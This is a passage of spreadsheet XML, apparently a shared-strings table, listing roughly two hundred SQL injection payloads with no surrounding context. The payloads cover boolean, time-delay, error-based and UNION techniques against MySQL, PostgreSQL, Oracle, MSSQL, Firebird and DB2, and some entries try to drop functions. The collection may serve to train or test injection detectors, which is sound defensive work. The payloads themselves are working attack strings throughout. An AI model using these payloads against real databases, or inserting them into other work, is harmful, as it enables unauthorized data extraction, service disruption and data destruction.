    <t xml:space="preserve">-2718" )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>1' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'bwrb' like 'bwrb</t>
  </si>
  <si>
    <t>1"  )  )   as fapw where 4722 = 4722 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1"  )  )   as swwb where 4244 = 4244</t>
  </si>
  <si>
    <t>1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'dgwe' like 'dgwe</t>
  </si>
  <si>
    <t>select  ( case when  ( 8689 = 2468 )  then 8689 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'fzgy' = 'fzgy</t>
  </si>
  <si>
    <t>1' where 7417 = 7417 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-2207%'  )  )   union all select 3339,3339,3339,3339,3339,3339#</t>
  </si>
  <si>
    <t>1  )  )   as oywa where 7951 = 7951 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-5211"  )  )   as bkvr where 4082 = 4082 or 2323 = 8052</t>
  </si>
  <si>
    <t>1 where 2238 = 2238</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "bkoq" = "bkoq</t>
  </si>
  <si>
    <t>-9355' or 6872 = 6872 and 'mztk' = 'mztk</t>
  </si>
  <si>
    <t xml:space="preserve">-5840' )  or elt ( 1032 = 1032,3623 ) </t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'irfn' where 8360 = 8360</t>
  </si>
  <si>
    <t>1"  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1" )  as eoer where 8667 = 8667 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( 'cpoy' = 'cpoy</t>
  </si>
  <si>
    <t>select  ( case when  ( 4769 = 4769 )  then 4769 else 4769* ( select 4769 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'suzs' where 2905 = 2905 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>-2055 )  or 3038 = 3038</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) </t>
  </si>
  <si>
    <t>1" )  where 9093 = 9093</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>1  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1 )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 7244 = 7244</t>
  </si>
  <si>
    <t>1'|| ( select 'jslz' where 8405 = 8405 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  ||'</t>
  </si>
  <si>
    <t>-2430' )  union all select 5712,5712,5712,5712,5712,5712,5712,5712,5712,5712--</t>
  </si>
  <si>
    <t>1%" )  union all select null,null--</t>
  </si>
  <si>
    <t>1 )  as ptxw where 9873 = 9873</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and 'qfaz' like 'qfaz</t>
  </si>
  <si>
    <t>1'+ ( select kgon where 9014 = 9014  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users  )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 'pags' = 'pags</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( '%' = '</t>
  </si>
  <si>
    <t>-4135'  )  )   )  union all select 4413,4413,4413#</t>
  </si>
  <si>
    <t>-2783%'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||c</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and "eaqk" = "eaqk</t>
  </si>
  <si>
    <t>1"  )  )   as xbhp where 7527 = 7527</t>
  </si>
  <si>
    <t>-7869%' union all select 2406,2406,2406,2406,2406,2406,2406,2406#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and make_set ( 8403 = 8403,8899 ) </t>
  </si>
  <si>
    <t>-5708 where 3134 = 3134 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>-1413" )  union all select 6651,6651,6651--</t>
  </si>
  <si>
    <t>1'+ ( select 'tmel' where 2655 = 2655 rlike  ( select  ( case when  ( 2118 = 8500 )  then 1 else 0x28 end  )  )   ) +'</t>
  </si>
  <si>
    <t>1  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  5888 = 5888</t>
  </si>
  <si>
    <t>1"  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  "ghdr" like "ghdr</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 4836 = 1823,1,1/0 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'msol' = 'msol</t>
  </si>
  <si>
    <t>1' )  where 6624 = 6624 and 5392 = 8258</t>
  </si>
  <si>
    <t>1'|| ( select 'zrea' from dual where 1223 = 1223 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-9054  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>-6487 )  or 6872 = 6872 and  ( 7688 = 7688</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'vwtq' = 'vwtq</t>
  </si>
  <si>
    <t>1"  )  )   as dpln where 4193 = 4193 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1 )  as lejp where 5238 = 5238 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  where 9086 = 9086 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-7627%"  )  )   union all select 4011,4011,4011,4011,4011,4011,4011,4011,4011,4011--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  "cxoi" = "cxoi</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) </t>
  </si>
  <si>
    <t>-6198" )  or make_set ( 3602 = 2178,2178 )  and  ( "xksq" like "xksq</t>
  </si>
  <si>
    <t>1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  -- zvkh</t>
  </si>
  <si>
    <t>1" )  where 4905 = 4905 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( case when 5514 = 9602 then 1 else null end ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-5667%'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>-8639 )  or 8138 = 6252</t>
  </si>
  <si>
    <t>1  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and "ojpe" like "ojpe</t>
  </si>
  <si>
    <t>-6540' )  where 5019 = 5019 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1217 = 8831,1,1/0 ) </t>
  </si>
  <si>
    <t>1' where 5786 = 5786 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( 8600 = 8600</t>
  </si>
  <si>
    <t>1" and 7533 = 7533 and "btak" like "btak</t>
  </si>
  <si>
    <t xml:space="preserve">1' and elt ( 4249 = 4249,7259 ) </t>
  </si>
  <si>
    <t>1 where 6494 = 6494 and 8463 = 2760</t>
  </si>
  <si>
    <t xml:space="preserve">-2718" or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  ) </t>
  </si>
  <si>
    <t>if ( 3392 = 4422 )  select 3392 else drop function xsqq--</t>
  </si>
  <si>
    <t>1'  )  )   as tlsl where 8467 = 8467</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1  )  )   as ipfy where 1189 = 1189</t>
  </si>
  <si>
    <t>1'  )  )   as fbjd where 8597 = 8597</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-9953'|| ( select 'zljk' where 2886 = 2886 union all select 2886,2886,2886,2886,2886,2886,2886,2886,2886,2886#</t>
  </si>
  <si>
    <t>1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'rpiz' like 'rpiz</t>
  </si>
  <si>
    <t>-9954"  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t>1'|| ( select 'tisi' from dual where 1616 = 1616 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  ||'</t>
  </si>
  <si>
    <t>1'|| ( select 'yrau' where 7860 = 7860 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  ||'</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 7533 = 7533#</t>
  </si>
  <si>
    <t>1%'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  as ftyp where 5851 = 5851 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%" )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1' where 2958 = 2958</t>
  </si>
  <si>
    <t>-7499%" )  union all select 1893,1893,1893,1893,1893#</t>
  </si>
  <si>
    <t>-7796' )  union all select 4960,4960,4960,4960,4960,4960,4960,4960,4960,4960#</t>
  </si>
  <si>
    <t>1 )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 'pehq' like 'pehq</t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 2721 = 8716 )  then 1 else 0x28 end  )  )   and  ( 'dumt' = 'dumt</t>
  </si>
  <si>
    <t>-5082  )  )   union all select 4013,4013,4013,4013,4013,4013,4013,4013,4013,4013#</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5'#</t>
  </si>
  <si>
    <t>-7707'  )  )   union all select 3172#</t>
  </si>
  <si>
    <t xml:space="preserve">-3559' )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>if ( 8812 = 7896 )  select 8812 else drop function xltk--</t>
  </si>
  <si>
    <t>-4137  )  )   as elxu where 5672 = 5672 order by 1--</t>
  </si>
  <si>
    <t>1" )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "kzcd" = "kzcd</t>
  </si>
  <si>
    <t>-6616 )  order by 1--</t>
  </si>
  <si>
    <t>1" )  where 2367 = 2367</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (  'uvlf' = 'uvlf</t>
  </si>
  <si>
    <t>1' )  where 6081 = 6081 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  as lipa where 3450 = 3450 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>1'+ ( select pepf where 5071 = 5071 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-6334' )  union all select 3738,3738,3738,3738,3738,3738,3738,3738--</t>
  </si>
  <si>
    <t>-6912' in boolean mode )  union all select 6012--</t>
  </si>
  <si>
    <t>1 )  as itvm where 1482 = 1482</t>
  </si>
  <si>
    <t>1' where 9222 = 9222 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>if ( 4907 = 9581 )  select 4907 else drop function apqw--</t>
  </si>
  <si>
    <t>1" where 8672 = 8672 union all select null,null#</t>
  </si>
  <si>
    <t>1' in boolean mode )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 3039 = 3039</t>
  </si>
  <si>
    <t>-8999" where 2821 = 2821 union all select 2821,2821,2821,2821,2821,2821,2821,2821#</t>
  </si>
  <si>
    <t>-4035' union all select 9540,9540,9540,9540,9540,9540,9540,9540,9540,9540--</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1%' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and '%' = '</t>
  </si>
  <si>
    <t>-4477'  )  )   union all select 8444,8444,8444,8444,8444,8444,8444,8444--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-7466 where 5161 = 5161 or 3038 = 3038</t>
  </si>
  <si>
    <t>1" where 3221 = 3221 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>-4669' union all select 9387,9387,9387,9387,9387,9387,9387,9387,9387,9387--</t>
  </si>
  <si>
    <t>-7843' where 5986 = 5986 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 9875 = 8961,1,1/0 ) </t>
  </si>
  <si>
    <t>1' )  and  ( 3020 = 3020 ) *6703 and  ( 'botl' like 'botl</t>
  </si>
  <si>
    <t>1 )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 2303 = 2303</t>
  </si>
  <si>
    <t>-2797'  )  )   )  union all select 5711#</t>
  </si>
  <si>
    <t>1'  )  )   and  ( 7517 = 3423 ) *3423 and   (  (  'aenz' = 'aenz</t>
  </si>
  <si>
    <t>-8878' in boolean mode )  union all select 7785#</t>
  </si>
  <si>
    <t>1' )  as ezoa where 4915 = 4915 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  'ltki' = 'ltki</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "acbq" like "acbq</t>
  </si>
  <si>
    <t>1'|| ( select 'zqdn' where 6194 = 6194 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as ezpq where 2976 = 2976 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-6190' )  where 2621 = 2621 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 1343 = 1343 )  then  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  else 1343 end )  from dual ) </t>
  </si>
  <si>
    <t>1" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-3219" )  order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve">-2992'  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 </t>
  </si>
  <si>
    <t>1'  )  )   as kfnt where 8090 = 8090 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1" or sleep ( 5 )  and "fbuo" like "fbuo</t>
  </si>
  <si>
    <t>-5757%" )  or 6872 = 6872 and  ( "%" = "</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  where 3187 = 3187 order by 1#</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 6116 = 6116 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'pcps' from dual where 7255 = 7255 and 7121 = 4603</t>
  </si>
  <si>
    <t>1" )  as zuzm where 1211 = 1211 and elt ( 5458 = 2966,2966 ) --</t>
  </si>
  <si>
    <t>-5113'  )  )   )  or 7200 = 3094--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  "soyg" = "soyg</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  "qani" = "qani</t>
  </si>
  <si>
    <t>1"  )  )   as gbxx where 2459 = 2459 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1  )  )   as rbcf where 1053 = 1053</t>
  </si>
  <si>
    <t>1' where 4245 = 4245 union all select null,null--</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( 'knhm' = 'knhm</t>
  </si>
  <si>
    <t>-3505" )  or 5290 = 3436--</t>
  </si>
  <si>
    <t>1'+ ( select yjtm where 3965 = 3965 and 9389 = 3443</t>
  </si>
  <si>
    <t>1 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-8506'  )  )   )  union all select 1950,1950,1950,1950,1950,1950--</t>
  </si>
  <si>
    <t>1'+ ( select 'ixvd' where 4772 = 4772 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>-9393' where 3119 = 3119 or 8571 = 8571--</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) # zwck</t>
  </si>
  <si>
    <t>-3298 union all select 7618,7618,7618,7618,7618,7618,7618,7618,7618,7618#</t>
  </si>
  <si>
    <t>1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'cxor' = 'cxor</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7323%" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118</t>
  </si>
  <si>
    <t>1'  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'nbsr' like 'nbsr</t>
  </si>
  <si>
    <t>-3677'  )  )   or 1939 = 4484</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'dzzx' = 'dzzx</t>
  </si>
  <si>
    <t>1'+ ( select 'ixza' where 4374 = 4374 union all select null,null,null--</t>
  </si>
  <si>
    <t>select  ( case when  ( 2830 = 7046 )  then 2830 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1%' )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1 )  as qzif where 7877 = 7877 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'wcmt' = 'wcmt</t>
  </si>
  <si>
